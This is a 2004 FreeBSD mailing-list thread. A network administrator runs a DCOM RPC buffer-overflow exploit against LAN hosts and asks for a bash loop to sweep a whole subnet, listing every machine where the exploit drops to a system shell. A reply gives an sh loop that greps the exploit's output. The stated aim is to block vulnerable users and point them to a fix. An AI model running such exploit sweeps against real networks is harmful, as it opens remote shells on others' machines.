Need bash help

2004-03-15 Thread hugle
Hello all.
I'm writing here, 'cause I think just here people can help me.
(p.s. didn't find bash mailing lists)

So here's what I'm planning to do.. I have a big LAN in here, and noticed that lots of 
users are still exploitable using RPC.

I've just found the source of this exploit, compiled it, and tried to use it - it works.

What I'm planning to do is automatically detect such users (exploitable).

So I run:
ftp# ./dc IP
and get: 
-
- Remote DCOM RPC Buffer Overflow Exploit
- Original code by FlashSky and Benjurry
- Rewritten by HDM hdm [at] metasploit.com
- Using return address of 0x77e626ba
- Dropping to System Shell...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32

END.
So if there is text like '- Dropping to System Shell...' it means that the system is 
vulnerable. Otherwise it returns:
-
- Remote DCOM RPC Buffer Overflow Exploit
- Original code by FlashSky and Benjurry
- Rewritten by HDM hdm [at] metasploit.com
- Using return address of 0x77e626ba
- Exploit appeared to have failed.



So what I wanna do is smth like:

for i in `seq 1 254`; do
./dc 192.168.1.$i
and if it returns 'Dropping to system shell' then add these IP to vulderable_users
done

Afterwards I'm planning to block those users on my router, and forward them to a webpage 
with an explanation of how to FIX that bug.

Thanks for help in advance
Jarek



___
[EMAIL PROTECTED] mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-questions
To unsubscribe, send any mail to [EMAIL PROTECTED]


Re: Need bash help

2004-03-15 Thread Chris Pressey
On Tue, 16 Mar 2004 01:40:51 +0200
hugle [EMAIL PROTECTED] wrote:

> Hello all.
> I'm writing here, 'cause I think just here people can help me.
> (p.s. didn't find bash mailing lists)
> [...]
> So what I wanna do is smth like:
>
> for i in `seq 1 254`; do
> ./dc 192.168.1.$i
> and if it returns 'Dropping to system shell' then add these IP to vulderable_users
> done

You could pipe the output of dc to grep and check the exit code. 
Something like:

# -i: dc prints the marker as 'Dropping to System Shell...'
if ./dc 192.168.1.$i | grep -i 'Dropping to system shell'; then
    echo 192.168.1.$i >> vulnerable_users
fi

YMMV, I haven't used bash; the above is sh, should work about the same.

-Chris